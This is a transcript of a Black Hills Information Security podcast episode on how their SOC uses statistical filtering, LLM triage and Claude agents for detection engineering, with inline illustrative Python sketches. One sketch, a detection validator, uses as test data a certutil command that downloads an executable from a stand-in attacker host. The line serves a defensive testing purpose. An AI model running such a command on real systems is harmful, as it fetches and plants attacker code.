AI in the SOC: Interview with Hayden Covington and Ethan Robish from the BHIS SOC | Episode 40
E40


Bronwen Aker:

Hello, everyone, and welcome to the AI Security Ops Podcast. Today, we have a very special episode. We have two additional people coming in to help us learn all about how SOCs, security operations centers, can take advantage of artificial intelligence, large language models, math, data, and all of that good stuff, and basically not only defend, but also track what is happening more effectively and more efficiently, not only to reduce the workload on our very important, very brilliant people, but also to better take care of our clients. So with us today, we have Ethan Robish, hello, and Hayden Covington.

Bronwen Aker:

In addition to our usual cast of characters, Dr. Brian Fehrman.

Brian Fehrman:

Hey. Hey.

Bronwen Aker:

Derek, are you also a doctor? Doctor Derek Banks?

Derek Banks:

No. Ah, but I did stay at a Holiday Inn Express last night.

Bronwen Aker:

Alright. Doctor, well, primary doctor Derek Banks, and I am, of course, Bronwen Aker. This podcast is brought to you by Black Hills Information Security, where we are pen testing experts extraordinaire, and also Antisyphon Training, the home of the, what are we calling it now, pay-forward-what-you-can model? Anyway, we specialize in real-world-focused cybersecurity training that is also affordable for people who maybe don't have massive budgets, making it easier for real people to achieve real skills so that they can operate in the real world of cybersecurity.

Bronwen Aker:

Take it away, gentlemen.

Derek Banks:

So one thing I wanted to point out is, and we can talk about socks in general, whatever kind of socks you like, argyle socks, plaid socks, whatever. But also, probably not widely known still, or maybe it's getting more widely known, is that we actually run a SOC at Black Hills as part of our services. So we're not just pen tests and training. We also have a SOC, and actually, there are other companies in our tribe too.

Derek Banks:

But anyway, you two work in our BHIS SOC. Right? Yeah.

Ethan Robish:

That is correct.

Hayden Covington:

The SOC was kinda under the radar there for a little bit. It was mostly, you know, word of mouth going between different people that we've worked with within Black Hills, just kind of in general. And then we spent about a year, last year, where we just kinda rebuilt everything from the ground up in a way that was more scalable. And so now we're trying to get the word out a little more that, you know, we have an MDR offering that is hopefully pretty comparable and hopefully, in a lot of places, beats everybody else out there. That's the Black Hills thing.

Hayden Covington:

Right? Is to be the best at whatever it is that we're doing. So the SOC has that same goal.

Derek Banks:

Yeah. I mean, Black Hills does a lot of things differently than other companies, and the SOC is one of those things. We tried to bootstrap it. We didn't take venture capital. We did it from, basically, "let's just start a SOC," and went down many different roads until we landed on the restructure, which is probably what led to how we can, you know, use AI. Right?

Derek Banks:

And so I don't really have a script or any questions for you all. I'm sure they'll come up. But why don't we just start with kinda how the architecture is and what we do for folks, and then how AI helps us with that?

Hayden Covington:

Okay. Yeah. I kinda have an idea of what Ethan will probably mention, so I'll stray away from the thing he spent a lot of time on. But just generally, our SOC is now all, like, infrastructure first.

Hayden Covington:

So it's all infrastructure as code. Everything's API based. And if you're familiar with AI, you can kinda understand how advantageous that is to us, because, you know, with a modern agent or MCPs, or even just a pretty decent agent that's command line based, you can really reach into pretty much anything. And so that was a pretty big driving factor in the restructuring: we need to be able to reach into and manage infrastructure. We need to triage and investigate alerts, that tier-one triage, you know, the alerts that are gonna become, you know, thousands of them.

Hayden Covington:

They're gonna stack. If we can reach in and analyze those with, you know, a trained model or prompts that we've tested thoroughly, that'll allow us to still alert on things that are noisy, but kind of offset some of that with some automated help. So yeah, that was the whole restructuring that kind of brought us to, you know, the platforms that we use now, including a SOAR platform and everything from email security to canaries, the whole deal. So it was a year-long experience.
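
A minimal sketch of what that kind of LLM-assisted alert triage call can look like, assuming the Anthropic Python SDK and a hypothetical alert format; the model name, prompt, and field names here are placeholders for illustration, not the actual BHIS pipeline:

```python
# Minimal sketch of LLM-assisted alert triage (hypothetical; not the actual BHIS pipeline).
# Assumes the Anthropic Python SDK (pip install anthropic) and ANTHROPIC_API_KEY in the environment,
# and assumes the model replies with raw JSON as instructed.
import json
import anthropic

client = anthropic.Anthropic()

TRIAGE_PROMPT = """You are a SOC tier-one triage assistant.
Given one alert as JSON, return only JSON with keys:
verdict (benign|suspicious|escalate), confidence (0-1), reasoning (short)."""

def triage_alert(alert: dict) -> dict:
    """Send a single, pre-filtered alert to the model and parse its verdict."""
    response = client.messages.create(
        model="claude-sonnet-4-5",   # placeholder model name
        max_tokens=512,
        system=TRIAGE_PROMPT,
        messages=[{"role": "user", "content": json.dumps(alert)}],
    )
    return json.loads(response.content[0].text)

if __name__ == "__main__":
    example = {
        "rule": "powershell_encoded_command",   # hypothetical alert fields
        "host": "WS-042",
        "user": "jdoe",
        "cmdline": "powershell.exe -enc SQBFAFgA...",
    }
    print(triage_alert(example))
```

In practice this step only sees the small slice of alerts that survives the earlier filtering, which is what keeps the API cost sane.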

Derek Banks:

Yeah. In the world of AI, you're only an API key away from the data. Right? So...

Ethan Robish:

Yeah. Yeah.

Derek Banks:

Yeah. You know, from somebody who was involved in the SOC and is now, like, off doing different things after the restructure: we went away from kinda, like, the SIEM model, where you go into a web interface and do a search and where analysts are actively, like, doing those things, to where we now have more of a logic and automation type approach before it bubbles up to an analyst. Is that kind of like the 30,000-foot view of how that works?

Hayden Covington:

That's a good way to put it. Yeah. Like, the automation pipelines of the SOAR really allow us to do a lot of things. That's where Ethan spent a lot of his effort, building some SOAR magic. But then we can also build our own, like, portal on top of the platforms.

Hayden Covington:

So we have a customer portal that pulls together all of the different parts of our service for customers and provides them management abilities across their endpoints. It allows them to search, you know, deployed packages and versions across their endpoints if there's a vulnerability. Like, since all of it's API based, we can offer them pretty much anything in this portal.
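
As a rough illustration of the kind of API-driven lookup a portal like that makes possible, here is a hedged sketch that asks a hypothetical endpoint-management REST API which hosts are still running a vulnerable package version; the base URL, routes, and JSON fields are invented for the example:

```python
# Hypothetical sketch: search deployed package versions across endpoints via a REST API.
# The base URL, routes, and JSON field names are invented for illustration only.
import os
import requests

BASE_URL = "https://edr.example.com/api/v1"   # placeholder endpoint-management API
HEADERS = {"Authorization": f"Bearer {os.environ['EDR_API_TOKEN']}"}

def find_vulnerable_hosts(package: str, bad_version: str) -> list[str]:
    """Return hostnames still running a known-vulnerable package version."""
    resp = requests.get(f"{BASE_URL}/endpoints", headers=HEADERS, timeout=30)
    resp.raise_for_status()
    vulnerable = []
    for host in resp.json()["endpoints"]:
        versions = {p["name"]: p["version"] for p in host.get("packages", [])}
        if versions.get(package) == bad_version:
            vulnerable.append(host["hostname"])
    return vulnerable

if __name__ == "__main__":
    # Placeholder package and version; the real portal queries the actual inventory data.
    print(find_vulnerable_hosts("examplepkg", "1.2.3"))
```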

Ethan Robish:

So, this being the AI podcast (yep), we should talk about how we're using AI, how we're integrating AI. So one thing that we did not do, Derek, you mentioned this jokingly, but we did not just set up OpenClaw or Clawdbot or whatever and say, run the SOC. Right? Like...

Derek Banks:

Wait. You didn't? No.

Ethan Robish:

You can tie

Brian Fehrman:

it into Moltbook and crowdsource your instance. Yeah. Yeah.

Derek Banks:

Yeah. So much can go wrong.

Ethan Robish:

I think what we found most effective is, instead of trying to, I mean, we say OpenClaw jokingly, but the equivalent would be, you know, just setting up something, connecting it to everything, and having the AI try to do everything. And I don't think we would be very effective if we tried to do that. So what we're doing is kind of laser focusing: you know, AI is really good at doing this aspect, and then we plug in over here and, like, tailor it for this aspect. So it's everything from, like Hayden mentioned, the portal, kind of the dashboard that customers can go in and see.

Ethan Robish:

AI was heavily used to code that portal. Right? And, obviously, being a pen test company, we had it pen tested by, you know, credentialed people, but it's not just, like, pure vibes.

Derek Banks:

Pure vibes. Yeah. Well, a lot of things are pure vibes these days. So when you were saying that, it kinda reminded me of a couple of things. But one in particular: if you'll remember the inverse triangle that I made, where you have all this data.

Derek Banks:

Right? And it gets filtered through rules, and basically, you know, you get like 90% of your stuff that you've seen a million times and you know it's fine. Right? And then you get this 10% that you might write some code for to whittle it down even further, to where you get to this chunk of data that is maybe 0.5% of the volume of data you have, and that's what you have the AI go look at. Is that kinda what you're saying?

Derek Banks:

The targeted analysis of specific portions of data? You can go into specifics. It'll be okay. Yeah.

Ethan Robish:

So I was talking about, like, just the different aspects where we're plugging in AI. So in the SOAR, for sure. It's funny. We talk about AI, and everyone thinks I must mean LLMs and, you know, chatbots and stuff.

Derek Banks:

I'm like, I'm aware of that battle.

Ethan Robish:

Right. Yeah. You guys know better than anyone.

Derek Banks:

But so, in the SOAR...

Derek Banks:

In most businesses, like, you know, LLMs are like 5% of what you can do with AI, and the other 95% is, you know, other things.

Ethan Robish:

Yeah. So we're actually, so that inverse triangle you're talking about, inverse pyramid, to filter down. I mean, if we started with all of our alerts, opened the floodgates, and gave it all to an LLM, we'd be in for a bad time. Like, we'd be paying way too much money and not getting great results. And so...

Derek Banks:

I was gonna say, sounds like a lot of API usage.

Hayden Covington:

We're at, like, tens of thousands or hundreds of thousands of alerts a day.

Derek Banks:

Right. Like, that kind of volume.

Hayden Covington:

Yeah. We also can't just send those to people.

Ethan Robish:

How do we filter those down? So, ironically, it's using more the traditional AI, I guess. Like, the boring AI. It's, like, k-means clustering and, like, basic statistics and rolling windows that just baseline organizations, compare against the baseline, and aggregate things together. And then once something becomes a signal that kinda goes above the baseline noise floor, that's what gets escalated to both, you know, AI triaging and our analysts looking at it.
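
A toy version of that "boring AI" baselining, assuming a simple per-organization rolling window and a z-score-style noise floor; the window size, threshold, and example numbers are made up for illustration, not the tuned production values:

```python
# Toy per-organization rolling baseline: escalate only when an alert count
# rises well above that org's own recent noise floor.
from collections import defaultdict, deque
from statistics import mean, stdev

WINDOW = 24 * 7      # e.g., one week of hourly counts (illustrative)
THRESHOLD = 3.0      # escalate when roughly 3 standard deviations above baseline

history = defaultdict(lambda: deque(maxlen=WINDOW))

def should_escalate(org: str, rule: str, count: int) -> bool:
    """Compare this hour's count for (org, rule) against its rolling baseline."""
    window = history[(org, rule)]
    escalate = False
    if len(window) >= 10:                 # need some history before judging
        baseline = mean(window)
        spread = stdev(window) or 1.0     # avoid divide-by-zero on flat baselines
        escalate = (count - baseline) / spread > THRESHOLD
    window.append(count)                  # always keep the baseline up to date
    return escalate

# Example: a sudden burst for one customer stands out against its own history.
for hour, n in enumerate([3, 4, 2, 5, 3, 4, 3, 2, 4, 3, 4, 55]):
    if should_escalate("acme-corp", "dns_tunneling", n):
        print(f"hour {hour}: count {n} is above the noise floor -> send to triage")
```

Clustering (for example, scikit-learn's KMeans) would sit alongside this to group similar alerts together before anything reaches an analyst or an LLM.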

Derek Banks:

Yeah. I've been referring to those types of techniques...

Ethan Robish:

LLM triaging, I should say.

Derek Banks:

Yeah. I've been referring to those types of techniques as just machine learning or statistical learning. Right? The traditional kind of, you know, stuff that doesn't take a huge data center to run. Maybe, like, you know, NLP or classification or something like that, but you're saying clustering.

Derek Banks:

Yeah. So basically, you're using math to take a large volume of data and make it a smaller volume of data that you can then do further analysis on. And I'll get the editors, the video editors, a picture of my triangle. But that's kinda what I was expecting: that you have a big data problem. Right?

Derek Banks:

There's an internet scale data problem, and so how do you make that a smaller amount of data? And the answer is math.

Hayden Covington:

Yeah. And we are using the standard LLMs too. So I think my favorite use case that I've seen from us is around, like, detection engineering. Like, we as a team, you know, over the year would write, our SOC director says, something like 50 detections a year. Right?

Hayden Covington:

Which is a pretty decent number; we're doing roughly one a week. And when you're buried in SOC alerts and restructuring, like, that's okay, but it needs to be higher. So that was one of the first...

Derek Banks:

You're talking about like previously in our SOC.

Hayden Covington:

Previously, yes.

Ethan Robish:

50 a year. Yeah.

Hayden Covington:

Roughly 50 a year. We'd have bursts where we did more. We'd bring in open source ones. 50 custom.

Derek Banks:

And there's some kind of breach where you're

Ethan Robish:

like, oh god. Right.

Derek Banks:

We need an alert.

Hayden Covington:

Exactly. And so that was one of the first areas we kind of targeted as, can we get some benefit out of this? And I won't go through all the details of things we did or didn't try, but I'll tell you how it works right now. You know, we had the Notepad++ stuff drop recently, about how that infrastructure was compromised and there are potential ramifications around that. So what we were able to do is take that report and then drop it into, you know, we're a Claude shop, so we dropped it into Claude, which has a skill that does research for detection engineering.

Hayden Covington:

So it has a very prescribed way that it gets specific data. It looks for preexisting open-source detections around these things. It structures all this in a certain way, and we can then take that structure and provide it to Claude inside of our Git repos for our detection engineering, which then has very specific and very expansive prompt instructions on how to write our threat detections, which includes, you know, everything from another location in that repo that contains mock events. And then it has instructions on, you know, step by step, what it needs to do to validate before it even makes a push. And then it pushes through GitHub Actions, which runs it through our rule pipeline and validators and, like, test deployments against the actual, you know, infrastructure it would be on.

Hayden Covington:

And then by the time it gets to, in this situation, let's say me, by the time it gets in front of me, it's been tested and validated. There are test events that show that, you know, if this log right here fired, this rule would trigger. And so all I then need to do, it's like I've been handed an alert, or a new detection opportunity, from, like, a tier-one analyst, and I just need to go through and spot check, make sure they did things right, make sure they didn't miss any glaring issues. And then I can also see all of their very detailed work, where they've explained all the things they did and why they made those decisions. And so I can, you know, write a rule and it can be done in two minutes, versus me having to go and do all these manual steps that AI is really, really good at doing predictably, as long as you tell it how to do it.
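
For flavor, here is a stripped-down sketch of that kind of mock-event validation step, assuming a simplified rule format where a detection is just a set of required field patterns; the rule language, sample events, and CI wiring in the real pipeline are more involved than this:

```python
# Stripped-down sketch of validating a detection against mock events before it is pushed.
# The rule format (simple field/value glob matchers) and the sample events are hypothetical.
from fnmatch import fnmatch

def rule_matches(rule: dict, event: dict) -> bool:
    """True if every field pattern in the rule matches the event."""
    return all(
        fnmatch(str(event.get(field, "")), pattern)
        for field, pattern in rule["match"].items()
    )

def validate_rule(rule: dict, positives: list[dict], negatives: list[dict]) -> list[str]:
    """Replay mock events; return a list of failures (an empty list means it passes)."""
    failures = []
    for ev in positives:
        if not rule_matches(rule, ev):
            failures.append(f"should have fired on: {ev}")
    for ev in negatives:
        if rule_matches(rule, ev):
            failures.append(f"false positive on: {ev}")
    return failures

if __name__ == "__main__":
    rule = {
        "name": "suspicious_certutil_download",   # hypothetical example rule
        "match": {"process": "certutil.exe", "cmdline": "*-urlcache*http*"},
    }
    positives = [{"process": "certutil.exe",
                  "cmdline": "certutil -urlcache -f http://evil.example/x.exe x.exe"}]
    negatives = [{"process": "certutil.exe", "cmdline": "certutil -dump cert.cer"}]
    problems = validate_rule(rule, positives, negatives)
    print("PASS" if not problems else "\n".join(problems))
```

A CI job can run a check like this for every rule in the repo and refuse the push if any mock event misbehaves, which is the spirit of the pipeline described above.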

Derek Banks:

Well, the predictability comes from the scaffolding code that's around it. Right? Exactly. Is all of that you described essentially in a custom skill that someone in our SOC wrote? Is it, like, basically custom skill scaffolding, or is it more like a multipart kind of thing?

Hayden Covington:

It's multifaceted. I mean, the research thing is a skill. The actual execution of the detection engineering is a very specific, like, CLAUDE.md file. And so...

Derek Banks:

Oh, okay.

Hayden Covington:

On GitHub, it was classified as a sub-agent of...

Ethan Robish:

Well, right.

Hayden Covington:

A specialized agent of sorts. So...

Ethan Robish:

We still have sub-agents, or, like, agents in Claude. We have, yeah, skills. We have CLAUDE.md files, and we have scripts to supplement that, because, yeah, like you said, Derek, the deterministic stuff you still need to codify and put guardrails around.

Ethan Robish:

Yeah. But as an example, so I just did a detection yesterday and deployed it last night. I looked at it today and I was like, so this is something that can go wrong, but I'll also say why it's actually kinda cool. So I had Claude write the detection. You know, I guided it with, like, hey, this is what I want to do, and then we've got other agents that, like, review the detection.

Ethan Robish:

So it had gone through, and, I had actually made it write two detections, one for each different type of data source, and it kinda mixed them. So, like, in one of them, it was using fields that only exist in the other data source. Ironically, I didn't catch it. I probably should have paid closer attention in the review. Claude didn't catch it.

Ethan Robish:

None of our validators caught it. So that's not great, but luckily, we have a process where, like, it's an experimental rule at first. It's not, like, the end of the world that it's doing this. But now I can go through and be like, hey, why did we miss this? Like, we've got all these layers.

Ethan Robish:

We can fix this. Like, we can prevent this from happening again. And, I don't know, I think that's pretty cool. Like, it's like having your teammate learn, but it's codified.

Ethan Robish:

It's like, here's the process, you know, the process that you might write in, like, an SOP, but the agents actually adhere to it. Like, they're reading it every single time, versus humans. You know? You read the SOP a couple of times and you're like, yeah, I don't need to look at it again, I remember it.

Ethan Robish:

And then they forget things and

Derek Banks:

Yeah. I've noticed that more on, you know, two ends of the spectrum of people right now in information security. The curmudgeons who think AI is still a fad and they're never gonna use it, and the folks who think AI, like, fixes everything and does everything perfectly, and neither of those is true. Right?

Derek Banks:

But it's surprising: when AI is wrong, people like to point it out, and, well, people are wrong too. Right? Like, that mistake could have been made by a person. And I remember one time, a pen test report. I went through a pen test report.

Derek Banks:

It went through tech review and writing review and everything, and it still had a customer name that wasn't the customer in there. Right? Like, everybody missed it somehow. And so people make mistakes too. And that's why you have ways to check those things and then double check those things.

Brian Fehrman:

Yeah. And I think that the entire approach that you described is wonderful, because it touches on and solves so many different issues. I mean, the two big things that I see there are breaking things down into very discrete tasks rather than one monolithic approach, and then also having that explainability aspect, that you can go back and look through each step of the process at what it did and why it did it, and be able to really troubleshoot it. Because otherwise, the way that I look at it is, if you just try to do everything in one huge monolithic go and just hope for the best...

Brian Fehrman:

It's like skipping an entire game to the final boss battle and hoping for the best. And it's like, you don't know the controls, you don't know the mechanics, you don't know how anything works, you're just gonna be like, I just hope it goes well. And then what do you do if it doesn't? Right? Now you gotta go back, you gotta restart, you gotta relearn all of that from scratch, and, you know, it might not end up saving any time.

Brian Fehrman:

And so the approaches and the guardrails and everything that you guys described that you have in place, I think, is the perfect approach to it.

Hayden Covington:

Ethan mentioned a part of that very briefly: it's then code reviewed. We did this all through GitHub Copilot, so it's not just limited to Claude. And it was very fascinating to watch. We would kick off the actual assignment of a GitHub issue to the agent that would then write the detection. It would then, you know, push this out, which would trigger the settings we had on our repo so that things are automatically code reviewed by GitHub Copilot. So it would push this out, and then Copilot, using a different set of instructions, would review its own work, in a sense.

Hayden Covington:

And we could then tag it back and say, hey, you missed this, can you go fix this? And it would be like a back and forth with, you know, two personalities of one agent, which was kind of funny to watch sometimes. And other times, it wasn't as funny, like when we had a hundred comments on a Git issue, which got to be a little much. That one was probably my fault, because I merged, or tried to merge, I think, like, 30 AWS rules.

Hayden Covington:

And it wrote them in twenty minutes, and it eventually did a pretty dang good job. But it was a very big PR to review.

Derek Banks:

I've actually noticed that with ChatGPT, like, 5 recently: the big model tends to be a little bit more detailed and verbose than I want it to be. Yeah.

Bronwen Aker:

Verbosity has been a problem with LLMs, I know, forever. So you guys have touched on a couple of things that, as a former software developer, I'm delighted to hear, because the monolith, the huge, massive uber prompt, to me, that's too much like a black box. And what I'm hearing is that the way you are implementing agents, and, you know, other agents all over these places, checks and balances, the granularity, that gives so much more control to us as humans, as supervisors of these silicon entities that are acting on our behalf. It's very reassuring to hear, because one of the big words that I know gets thrown around frivolously is accountability, and if you can't track down exactly where something broke, well, we're gonna be held accountable for what they do anyway.

Bronwen Aker:

And now it sounds like you've got that ability to really figure out what's going on, and the reproducibility. Oh my god. It's kinda like when I first discovered automated testing. I was so delighted. That was a happy day.

Bronwen Aker:

Well,

Derek Banks:

that's the thing that I have really enjoyed with how I've been using Claude Code most recently: having it do testing and debugging, like, interactively with me. And I really enjoyed it. It was building a Docker container for me, and it just put itself in a loop and would check back every minute to see if the job was done. I didn't ask it to do that, and I was like, why, thank you. I'm going to go have a sandwich.

Derek Banks:

So...

Hayden Covington:

Well, one thing real quick, Bro. When you mentioned accountability, I love that, because when we mention AI in the security space, sometimes people get scared. They're like, okay, so you just let Anthropic do whatever. Great.

Hayden Covington:

Love that. But sort of what we've tried to push in the SOC is very much: if you ask an agent to do some work, you are effectively signing off on that work as your own, and you are going to be held accountable if it is in any way incorrect. And so, you know, like anything else, it's a tool. And so you use this agent as a tool to complete some work. If I were to perform a test and use, you know, name a tool, and I do it wrong in some way, that's my fault.

Hayden Covington:

So if I'm using an LLM or an agent or whatever for this work and I push this work and it breaks something, that's on me.

Derek Banks:

So, you know, what I'm saying in my training class, like, up front is, you should look at the current capabilities of AI as a super powerful intern, yes, that is really talented, but also still needs a lot of supervision. Yeah. Definitely.

Bronwen Aker:

I usually say it's a drunk intern. Yeah.

Derek Banks:

That was, like, 2024. But, like, in 2025 it was settling, like, it was getting better, and now it's, like, hungover the next day. Right? Like...

Bronwen Aker:

Yeah. Well, you know, it has good hits, moments of brilliance, and then it has some really creative bad misses.

Derek Banks:

I will say, and y'all probably heard this, I don't know what kind of other, like, AI podcasts and stuff y'all listen to, if at all. But I've listened to a couple of different ones, and the general consensus in the AI community seems to be that somewhere in November or December, we kinda turned a corner, and things are different now, specifically with Claude Code and the latest Opus model, which I hear they have another one potentially coming out real soon, which is...

Hayden Covington:

Yeah.

Derek Banks:

Okay. Yes. Right?

Hayden Covington:

Excited for that.

Derek Banks:

Yeah. And so, you know, I kinda feel like too, yeah, the model's great. But using OpenCode with GPT-5.1, I really think it's the iterative agent that is kind of the groundbreaking thing. And so I feel like 2026 is gonna be the year of everybody figuring out that these iterative agent type technologies are really powerful. And again, it's the scaffolding code, not necessarily the model.

Bronwen Aker:

So I know that we have a time constraint for Ethan. Do we wanna give him the floor so that he can talk about some of the coolness he's been working on?

Derek Banks:

Absolutely.

Ethan Robish:

I mean, I think I just did, but I will take it. So one thing that I've kinda realized, like, in the last few months, you know, getting more into AI, is that from the outside, getting started seems kind of intimidating. You hear people having all these success stories of, you know, yeah, it's just magic, it's doing the thing. And then you go try it, and, you know, you're basically trying to one-shot everything at that point, like when you first start. And I'm reading a book that's actually pretty good.

Ethan Robish:

It talks about the impressive demos of, like, hey, it can one-shot an application. The ones that it, like, knocks out of the park are ones that are all over its training data set. Like, everyone has written a to-do list application in every single language. It can one-shot it because it's seen the whole project already. It's not figuring it out on the fly.

Ethan Robish:

If you have to try to one-shot, you know, something more complex, something unique to your situation, it's probably gonna fail. And I think the key is to get there, like, incrementally. You don't just go from trying to one-shot everything to having all these guardrails in place and having it plugged in umpteen different ways and doing individual tasks. Like, start incrementally. And once you get to a point where you've got the scaffolding set up, you can tell it, like, okay, here's my unit test, here are my, you know, hooks that check things every single time that the code runs.

Ethan Robish:

Like, every time you find a mistake, you can tell the AI, hey, here's the mistake, or here's what happened that I don't want to happen. Like, look at our scaffolding and figure out how to fix that so it doesn't happen again. Or you can give it ideas to improve. It can start improving itself, obviously with your guidance, but that's where it starts to snowball. You roll down the hill and your snowball gets bigger, and all of a sudden, like, you look back up and you're like, oh, wow.

Ethan Robish:

That

Derek Banks:

It became an avalanche.
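
An example of the kind of guardrail scaffolding Ethan is describing: a small check script that an agent (or a CI hook) can be told to run after every change, so failures surface immediately and each new mistake can be codified as another check. The specific commands and paths below are placeholders, not the BHIS setup:

```python
# Hypothetical guardrail runner an agent or CI hook could be required to invoke after
# every change: lint, run tests, validate rules, and fail loudly if anything breaks.
# The commands and script paths are placeholders for illustration.
import subprocess
import sys

CHECKS = [
    ("lint", ["ruff", "check", "."]),
    ("unit tests", ["pytest", "-q", "tests/"]),
    ("rule validation", ["python", "scripts/validate_rules.py"]),  # placeholder path
]

def main() -> int:
    failed = []
    for name, cmd in CHECKS:
        result = subprocess.run(cmd, capture_output=True, text=True)
        if result.returncode != 0:
            failed.append(name)
            print(f"[FAIL] {name}\n{result.stdout}{result.stderr}")
        else:
            print(f"[ OK ] {name}")
    return 1 if failed else 0

if __name__ == "__main__":
    sys.exit(main())
```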

Hayden Covington:

Yeah. And no one's gonna share, like, the failure stories, or those failure stories aren't gonna get as much traction either. Like, it's much better to share a tweet about how, like, AI one-shot whatever this app is that this person just put together, and here it is on GitHub, and also here are all my donation links and everything. Like, they're only gonna share the things that make them look good.

Derek Banks:

Ethan, what's the name of that book?

Ethan Robish:

It's Vibe Coding, which, okay, so first, my first thought, and probably other people's thought: a hardcover book on AI, something that changes, like, fundamentally week to week? That seems ridiculous. Like, why waste my time?

Derek Banks:

Oh, is this the Gene Kim one?

Ethan Robish:

The thing that got me was it's written by Gene Kim, who is the author of The Phoenix Project. Yeah. And, oh, Steve Yegge, who I hadn't heard of, but, like, just reading his blogs and stuff, he's kinda on the forefront of AI.

Derek Banks:

I'm gonna have to get

Ethan Robish:

Of real LLM usage, I should say.

Derek Banks:

it on my flight out to Denver on Sunday and start reading it.

Ethan Robish:

I haven't finished the book, but so far, like, I've gotten a bunch of good things from it. It seems, you know, broadly applicable. I mean, maybe in five years it looks very different, but I'm learning some good things from it.

Derek Banks:

Cool. One thing before we close out, I wanna say, in addition to what you just said: that's how I started developing skills. I went and got Daniel Miessler's PAI, personal AI infrastructure, looked at what he did, and then told Claude, I want a skill to do this, help, like, I said, make a plan for it. We went through the plan and then basically started building the skill that I wanted, and I ended up with a skill that does binary analysis for security flaws. And it actually seems to work.

Derek Banks:

I just need more binaries to test. I'm in the testing phase right now before I say that this is good. Right? So

Hayden Covington:

AI is remarkably good at helping you build more functionality on top of it. Like, skills, better prompts. You can do a lot of things by just using the AI to do those things. Like, as we've deployed it across the SOC to our team, people run into issues, and, you know, it maybe sounds a little bit rude, but one of the first questions I ask is, well, did you ask Claude how to fix this issue? Like, I'm sure it knows itself pretty well.

Hayden Covington:

Right. Yeah. Like, did you ask Claude how to do this thing?

Derek Banks:

Oh, man. Well, hey. I really appreciate y'all coming on to the podcast and talking to us about what's going on in the SOC. If you wanna come again at a later date, you're more than welcome to. We're kinda informal around here.

Derek Banks:

And as with all things content related at Black Hills Information Security, it's more of a let's keep putting it out kind of thing than let's wait until we've done something really cool. So if there are things you didn't talk about, you wanna come back, you know, after Denver, like in February at some point, just, yeah, let us know. Sweet. Thanks.

Hayden Covington:

Yeah. Thanks for having us.

Brian Fehrman:

Thanks, guys. This has been great.


Creators and Guests

Brian Fehrman (Host)
Brian Fehrman is a long-time BHIS Security Researcher and Consultant with extensive academic credentials and industry certifications who specializes in AI, hardware hacking, and red teaming, and outside of work is an avid Brazilian Jiu-Jitsu practitioner, big-game hunter, and home-improvement enthusiast.

Bronwen Aker (Host)
Bronwen Aker is a BHIS Technical Editor who joined full-time in 2022 after years of contract work, bringing decades of web development and technical training experience to her roles in editing pentest reports, enhancing QA/QC processes, and improving public websites, and who enjoys sci-fi/fantasy, Animal Crossing, and dogs outside of work.

Derek Banks (Host)
Derek is a BHIS Security Consultant, Penetration Tester, and Red Teamer with advanced degrees, industry certifications, and broad experience across forensics, incident response, monitoring, and offensive security, who enjoys learning from colleagues, helping clients improve their security, and spending his free time with family, fitness, and playing bass guitar.

Ethan Robish (Guest)
Ethan Robish has worked with Black Hills Information Security (BHIS) since 2008, first as an intern and then as a full-time Security Consultant starting in 2012. In his current role as a Threat Hunter, Ethan is involved with customer engagement, research, working with Active Countermeasures' AC-Hunter, as well as improving BHIS HTOC and SOC offerings. Previously, he implemented defensive security solutions for the Exchange Online security team as a Microsoft intern. While in college, he competed in the International Collegiate Programming Competition (ICPC) World Finals. In his time off, he enjoys cooking, playing the piano, and reading fantasy novels.

Hayden Covington (Guest)
Hayden Covington joined Black Hills Information Security (BHIS) in the Summer of 2022 as a SOC Analyst. He chose BHIS after hearing many great things over the years and seeing the quality of work, as well as finding people who have the same passion for the field as he does. His favorite part of the job so far has been the community. Previously, Hayden worked in a SOC for a Naval contractor, where he also served as their SOAR project manager and SME, as well as insider threat lead. When he's not working, Hayden can be found doing anything athletic (like triathlons!), as well as enjoying video gaming and Formula 1.